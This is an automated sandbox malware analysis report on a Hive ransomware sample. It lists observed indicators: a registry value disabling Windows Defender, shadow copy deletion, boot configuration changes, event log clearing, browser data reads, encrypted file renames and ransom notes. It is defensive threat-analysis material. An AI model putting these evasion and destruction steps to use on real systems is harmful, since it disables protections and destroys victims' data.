Malware Analysis Report

2024-10-16 03:12

Sample ID 220112-vbydqaddbn
Target d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.7z
SHA256 8911b5d28e47048d4db01cefb105a74b070fc1126e5952bb4e383dcc1330a927
Tags
hive evasion ransomware spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

8911b5d28e47048d4db01cefb105a74b070fc1126e5952bb4e383dcc1330a927

Threat Level: Known bad

The file d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.7z was found to be: Known bad.

Malicious Activity Summary

hive evasion ransomware spyware stealer trojan

Modifies Windows Defender Real-time Protection settings

Deletes Windows Defender Definitions

Hive

Modifies security service

Modifies boot configuration data using bcdedit

Clears Windows event logs

Deletes shadow copies

Reads user/profile data of web browsers

Launches sc.exe

Drops file in Program Files directory

Suspicious use of WriteProcessMemory

Runs net.exe

Interacts with shadow copies

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-01-12 16:49

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-01-12 16:49

Reported

2022-01-12 16:54

Platform

win7-en-20211208

Max time kernel

190s

Max time network

125s

Command Line

"C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe"

Signatures

Deletes Windows Defender Definitions

evasion
Description Indicator Process Target
N/A N/A C:\Program Files\Windows Defender\MpCmdRun.exe N/A

Hive

ransomware hive

Modifies Windows Defender Real-time Protection settings

evasion trojan

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" C:\Windows\system32\reg.exe N/A

Clears Windows event logs

evasion ransomware

Deletes shadow copies

ransomware

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Reads user/profile data of web browsers

spyware stealer

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Shanghai.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_HfWYPhQrYmA0.j2xnp C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\MP00021_.WMF.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_riMptI5m7HU0.j2xnp C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\fr-FR\js\init.js C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\fr-FR\css\settings.css C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\Stationery\Peacock.htm C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe N/A
File opened for modification C:\Program Files (x86)\Windows Media Player\es-ES\WMPDMCCore.dll.mui C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\de-DE\slideShow.html C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe N/A
File created C:\Program Files (x86)\Common Files\microsoft shared\VSTA\8.0\iotb_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-lib-uihandler.jar.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_QVae35UIwqM0.j2xnp C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Bangkok.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_t0FT4y1WQNc0.j2xnp C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\WB01240_.GIF.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_2YkZ_mCLLAQ0.j2xnp C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.IE.XML.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_ZyruyCrLZko0.j2xnp C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\kk.txt.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_lR-LH5BGSzA0.j2xnp C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\es-ES\rtscom.dll.mui C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-attach_ja.jar.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_dG1gKCL2XYE0.j2xnp C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\J0115876.GIF.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_h69GoWNI8Rg0.j2xnp C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_MediumMAsk.bmp.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_zuO3f0bQsTo0.j2xnp C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe N/A
File created C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\LEVEL\iotb_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\TRANSLAT\FRAR\MSB1FRAR.ITS.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_EdAzsFPoOrI0.j2xnp C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0283209.GIF.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_8QcjDG7rB2k0.j2xnp C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\CONTACTINFOBB.DPV.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_TivHynjiEpY0.j2xnp C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\OrielMergeLetter.Dotx.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_hlIDUXEtFVY0.j2xnp C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.scheduler.nl_ja_4.4.0.v20140623020002.jar.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_sPLEMuIXMUg0.j2xnp C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\de-DE\js\settings.js C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0232795.WMF.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_6rB34lbx0Jg0.j2xnp C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-templates_zh_CN.jar.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_GNPLvFP_zFw0.j2xnp C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-bootstrap.xml.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H__x8qpQUJIsE0.j2xnp C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01631_.WMF.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_2zSkv8zaRpQ0.j2xnp C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105588.WMF.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_vnpVUI0zmOQ0.j2xnp C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe N/A
File opened for modification C:\Program Files (x86)\Windows Defender\de-DE\MpEvMsg.dll.mui C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\ja-JP\gadget.xml C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0198494.WMF.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_ydqZ9Eibfxs0.j2xnp C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainBackground.wmv C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\Panel_Mask.wmv C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.update\platform.xml.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_Jb5GmcdELIA0.j2xnp C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-compat.xml.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_2OXoKfEVGg40.j2xnp C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_rainy.png C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\Excel.en-us\ExcelMUI.XML.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_XmlTqu87f5s0.j2xnp C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\GRID_01.MID.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_MebdR_icuSY0.j2xnp C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\Stationery\HandPrints.jpg C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe N/A
File opened for modification C:\Program Files\Common Files\System\Ole DB\fr-FR\oledb32r.dll.mui C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107730.WMF.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_k47sWypKUJ00.j2xnp C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BabyBlue.css.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_W571iuh6NH40.j2xnp C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\es-ES\css\settings.css C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Vienna.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_tf-jit-Efes0.j2xnp C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe N/A
File opened for modification C:\Program Files\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0217872.WMF.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_bMr12DL6XJI0.j2xnp C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\EMAIL.XML.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_ZU91AzFYbw40.j2xnp C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309902.WMF.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_UlMp6y1OYVs0.j2xnp C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\shuffle_down.png C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\es-ES\gadget.xml C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\zipfs.jar.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_4AjEF-b91xo0.j2xnp C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe N/A
File opened for modification C:\Program Files\Windows Media Player\Network Sharing\ConnectionManager.xml C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\System\msadc\de-DE\msadcer.dll.mui C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\iotb_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\flower_precomp_matte.wmv C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe N/A
File opened for modification C:\Program Files\Internet Explorer\SIGNUP\install.ins.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_1CNpioIEzQk0.j2xnp C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+10.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_0Z_gQNoQDd80.j2xnp C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe N/A
File opened for modification C:\Program Files\Windows Mail\ja-JP\msoeres.dll.mui C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_MfeouGtus0c0.j2xnp C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105250.WMF.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_A_J90vBBQkk0.j2xnp C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Godthab.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_m1IaTRXRn340.j2xnp C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe N/A

Launches sc.exe

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1308 wrote to memory of 588 N/A C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe C:\Windows\system32\net.exe
PID 1308 wrote to memory of 588 N/A C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe C:\Windows\system32\net.exe
PID 1308 wrote to memory of 588 N/A C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe C:\Windows\system32\net.exe
PID 588 wrote to memory of 544 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 588 wrote to memory of 544 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 588 wrote to memory of 544 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1308 wrote to memory of 1116 N/A C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe C:\Windows\system32\net.exe
PID 1308 wrote to memory of 1116 N/A C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe C:\Windows\system32\net.exe
PID 1308 wrote to memory of 1116 N/A C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe C:\Windows\system32\net.exe
PID 1116 wrote to memory of 1072 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1116 wrote to memory of 1072 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1116 wrote to memory of 1072 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1308 wrote to memory of 1628 N/A C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe C:\Windows\system32\net.exe
PID 1308 wrote to memory of 1628 N/A C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe C:\Windows\system32\net.exe
